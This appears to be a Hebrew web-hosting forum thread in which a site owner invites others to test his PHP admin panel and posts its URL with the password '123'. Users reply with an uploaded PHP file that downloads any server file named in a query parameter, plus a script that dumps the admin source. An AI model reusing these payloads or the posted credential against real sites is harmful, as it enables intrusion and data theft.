הוסטס - פורום אחסון האתרים הגדול בישראל

- פורום תיכנות (https://hosts.co.il/forums/forumdisplay.php?f=14)

- - בדיקות אבטחה.. (https://hosts.co.il/forums/showthread.php?t=25679)

בדיקות אבטחה..

בהמשך לאשכול הקודם(http://www.hosts.co.il/forums/showthread.php?t=25673) על הקוד שלקחו לי החלטתי לפרסם את הכתובת למערכת פה,
מי שמצלי לפרוץ או להוריד משהו למחשב שו שיגיד לי איך לעזאזל עושים דבר כזה ואיך מונעים את זה!

http://www.d-arena.com/bla/admin.php
סיסמא 123

פרצתי לך את המערכת בשניות ואני יודע את השם של המסד

arena_cms

וגם את הסיסמא

מה?
איך עשית את זה?
אפשר לדבר איתך בפרטי?

העליתי קובץ עם הקוד הבא:

PHP קוד:


		
			
<?php

$file = $_GET['file'];

header ("Content-type: application/x-php");

header ("Content-disposition: attachment; filename=".$file.";");

header("Content-Length: ".filesize($file));

readfile($file);

exit;

?>

ציטוט:

נכתב במקור על ידי lalamen

העליתי קובץ עם הקוד הבא:

PHP קוד:


		
			
<?php

$file = $_GET['file'];

header ("Content-type: application/x-php");

header ("Content-disposition: attachment; filename=".$file.";");

header("Content-Length: ".filesize($file));

readfile($file);

exit;

?>

אהה זה היה לפני שחסמתי העלאת קבציםשל PHP...עכשיו זה חסום כבר..תנסה שוב אני אל חושב שתצליח..

---ערכיה---

מי שעדיין מצליח להעלות קבצי PHP זה כי הוא עדיין מופנה לDNS הישן...
אני לא יכול לשנות שם כבר את הקבצים אין יל גישה יותר.

הנה עוד חלק מהקוד שלך:

PHP קוד:


		
			
<?php



$file = "../admin.php";



$file = file_get_contents($file);



echo htmlspecialchars($file);



?>

<?php ob_start(); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1255" />
<title>פאנל ניהול פלייבקים</title>
<style type="text/css">

</style>

<script language=JavaScript>
function openWin(my_var) {
window.open(my_var,'CatDelete','menubar=no,resizab le=no,scrollbars=yes,width=600,height=400');
}
</script>

</head>

<body>
<br><br>
<center><font size="3">
<table dir="rtl" width="100%"><tr bgcolor="#F0F0F0"><td><a href="admin.php">ניהול ראשי</a> | <a href="javascript: openWin('admin.php?act=add')">הוסף פלייבק</a> | <a href="javascript: openWin('admin.php?act=search')">חפש פלייבק</a> | <a href="admin.php?act=showheb">הצג קטגוריה עברי</a> | <a href="admin.php?act=showen">הצג קטגוריה לועזי</a></td></tr></table></font>

<?php

session_start();
if($_SESSION['admin']=='true'){
include 'db.php';
$act=$_GET['act'];
switch($act) {
case "view":
include 'act/view.php';
break;
case "add":
include 'act/add.php';
break;
case "showheb":
include 'act/showheb.php';
break;
case "showen":
include 'act/showen.php';
break;
case "deletesong":
include 'act/deletesong.php';
break;
case "search":
include 'act/search.php';
break;
case "editsong":
include 'act/editsong.php';
break;
case "mail":
include 'act/mail.php';
break;
default:
header("Location: admin.php?act=view");
break;

}
}else header('Location: login.php');
?>
</center>
</body>
</html>

תעשה לי טובה, תגיד לי שאתה לא מרוויח כסף מתיכנות, כי זה רוע ללקוחות.

ציטוט:

נכתב במקור על ידי lalamen

העליתי קובץ עם הקוד הבא:

PHP קוד:


		
			
<?php

$file = $_GET['file'];

header ("Content-type: application/x-php");

header ("Content-disposition: attachment; filename=".$file.";");

header("Content-Length: ".filesize($file));

readfile($file);

exit;

?>

אפשר לשאול שאלה?
אז העלת את הקובץ הזה לשרת שלו...

מה עכשיו אתה עושה אחרי שהעלת את הקובץ?
אתה נכנס לאיו דרך הכתובת ואז מה קורה?
אשמח אם תענה לי בפה או בפרטי... בבקשה |מסמיק|

יום טוב.

ציטוט:

נכתב במקור על ידי Eye-Soft

<?php ob_start(); ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1255" />
<title>פאנל ניהול פלייבקים</title>
<style type="text/css">

</style>

<script language=JavaScript>
function openWin(my_var) {
window.open(my_var,'CatDelete','menubar=no,resizab le=no,scrollbars=yes,width=600,height=400');
}
</script>

</head>

<body>
<br><br>
<center><font size="3">
<table dir="rtl" width="100%"><tr bgcolor="#F0F0F0"><td><a href="admin.php">ניהול ראשי</a> | <a href="javascript: openWin('admin.php?act=add')">הוסף פלייבק</a> | <a href="javascript: openWin('admin.php?act=search')">חפש פלייבק</a> | <a href="admin.php?act=showheb">הצג קטגוריה עברי</a> | <a href="admin.php?act=showen">הצג קטגוריה לועזי</a></td></tr></table></font>

<?php

session_start();
if($_SESSION['admin']=='true'){
include 'db.php';
$act=$_GET['act'];
switch($act) {
case "view":
include 'act/view.php';
break;
case "add":
include 'act/add.php';
break;
case "showheb":
include 'act/showheb.php';
break;
case "showen":
include 'act/showen.php';
break;
case "deletesong":
include 'act/deletesong.php';
break;
case "search":
include 'act/search.php';
break;
case "editsong":
include 'act/editsong.php';
break;
case "mail":
include 'act/mail.php';
break;
default:
header("Location: admin.php?act=view");
break;

}
}else header('Location: login.php');
?>
</center>
</body>
</html>

תעשה לי טובה, תגיד לי שאתה לא מרוויח כסף מתיכנות, כי זה רוע ללקוחות.

אני אומר לך שוב,אם אצלחת להעלות קובץ PHP זה רק כי לא התעדכן לך הDNS עדיין ואין לי גישה לשרת השני לחסום של העלאת קבצי PHP.

אם הצלחת בדרך אחרת אני אשמח לדעת איך.

לא העלתי שום קובץ. המערכת שלך היא אחת המערכות הפריצות והבנויית בצורה הטיפשית שראיתי :\
עניתי לך על איך באשכול הקודם...